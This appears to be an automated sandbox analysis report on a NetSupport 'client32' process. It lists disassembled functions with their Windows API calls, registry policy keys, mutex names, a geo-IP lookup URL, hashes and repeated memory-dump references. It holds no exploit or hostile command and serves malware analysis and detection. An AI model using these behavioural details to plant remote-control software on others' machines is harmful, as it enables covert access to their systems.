                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
                                                                                                                                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                                                                    • API String ID: 3281479988-2492245516
                                                                                                                                                                                                    • Opcode ID: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                                                                                                    • Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91
                                                                                                                                                                                                    Function 1102FF34 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 176synchronizationlibraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                                                                    • API String ID: 2061479752-1320826866
                                                                                                                                                                                                    • Opcode ID: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                                                                                                    • Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62
                                                                                                                                                                                                    Function 11027E10 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 130librarysynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
                                                                                                                                                                                                      • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027E84
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027F01
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11027F17
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11027F20
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                                                                                    • String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                                                                    • API String ID: 512045693-1744591295
                                                                                                                                                                                                    • Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                                                                                    • Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0
                                                                                                                                                                                                    Function 1102C030 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 238synchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102C09A
                                                                                                                                                                                                      • Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102C194
                                                                                                                                                                                                      • Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                                                                                      • Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102C2A8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                                                                                                    • String ID: ?IP=%s$@r$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                                                                    • API String ID: 596640303-3071264536
                                                                                                                                                                                                    • Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                                                                                                    • Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61
                                                                                                                                                                                                    Function 11060CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                                                                    • Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                                                                                    • Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5
                                                                                                                                                                                                    Function 11134AC0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11134B22
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                                                                                      • Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11134B31
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11134B73
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 11134B98
                                                                                                                                                                                                    • _free.LIBCMT ref: 11134BEA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                                                                                    • API String ID: 711243594-1270230032
                                                                                                                                                                                                    • Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                                                                                    • Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1
                                                                                                                                                                                                    Function 68597610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 68597642
                                                                                                                                                                                                    • connect.WSOCK32(00000000,?,?), ref: 68597659
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,?), ref: 68597660
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 685976D3
                                                                                                                                                                                                    • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 685976F3
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 68597717
                                                                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 6859775C
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68597762
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6859777A
                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6859778B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                                                                                                    • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                                                                                    • API String ID: 4218156244-2969206566
                                                                                                                                                                                                    • Opcode ID: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
                                                                                                                                                                                                    • Instruction ID: 30e65d9f3c13ca9ba06203294eaad4451362e010f8f7e2b579c452b5405bcc0f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1441EB759403149BEB20DF64CC48BEEB3BAEF84305F8044AAE90997181EB705E58CFA1
                                                                                                                                                                                                    Function 11131260 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                      • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                      • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 111312C9
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 111312D1
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 111312D7
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 111312E3
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 111312FA
